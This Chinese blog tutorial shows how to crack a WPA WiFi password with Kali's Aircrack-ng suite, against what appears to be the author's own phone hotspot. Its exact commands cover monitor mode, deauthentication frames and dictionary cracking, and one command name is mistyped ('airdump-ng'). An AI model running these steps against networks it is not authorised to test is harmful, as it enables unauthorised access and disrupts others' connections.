记录一次实战破解无线wifi |
您所在的位置:网站首页 › linux无线攻击 › 记录一次实战破解无线wifi |
目录
0x00使用工具0x01操作步骤0x02图文详细步骤1.网卡配置网卡不用买贵的,tb一搜就有了,要问清楚kali能不能直接用,买不用装驱动的。确保虚拟机连接上网卡将wlan0设置为监听模式
2.扫描附近WIFI3.监听路由4.对路由发起攻击5.对包进行暴力破解
0x00使用工具
1.虚拟机VMware Workstation16 2.kali系统 3.kali自带工具Aircrack-ng 0x01操作步骤1.确保虚拟机连接网卡,将网卡设置为监听模式 2.扫描附近WIFI 3.选择攻击路由,进行监听模式 4.对路由发起攻击,获取数据包 5.对包进行暴力破解 0x02图文详细步骤 1.网卡配置 网卡不用买贵的,tb一搜就有了,要问清楚kali能不能直接用,买不用装驱动的。
1.虚拟机->可移动设备(勾选) 2.打开终端,iwconfig 查找到网卡名为wlan0 1.airmon-ng start wlan0 开启网卡wlan0监听模式 2.iwconfig 查看网卡状态,发现wlan0mon,表示已开启成功 命令:airdump-ng wlan0mon 以Test-phone为目标,上半段为扫描的路由,下部分为连接路由的设备。 BSSID代表路由器的 MAC 地址 PWR 代表信号的强度,数值越大代表信息越强 CH 代表信道 ENC代表用的加密的方式 AUTH 代表认证的方式 ESSID是WIFI的名字 命令:airodump-ng -c 1 -w /usr/ccdir/target_test --bssid 42:C8:9A:E4:4A:69 wlan0mon 命令解释:airodump-ng -c 信道(图中ch参数) -w 结果生成路径 --bssid mac地址 wlan0mon 重新打开一个终端,之前的窗口继续保留,用来查看是否抓包成功 命令:aireplay-ng -0 5 -a 42:C8:9A:E4:4A:69 -c 7E:6B:98:6C:CE:89 wlan0mon 第一个mac地址为路由地址,第二个mac地址为连接设备地址,station下方的地址 当监听窗口出现handshake时表示抓包成功 命令:aircrack-ng -w /usr/ccdir/pass/test.txt -b 42:C8:9A:E4:4A:69 /usr/ccdir/target_test-01.cap w后接的字典 mac地址后接cap包文件,注意生成的cap可能名字后面被加上-01,要查看 当发现KEY FOUND!表示密码爆破成功! |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |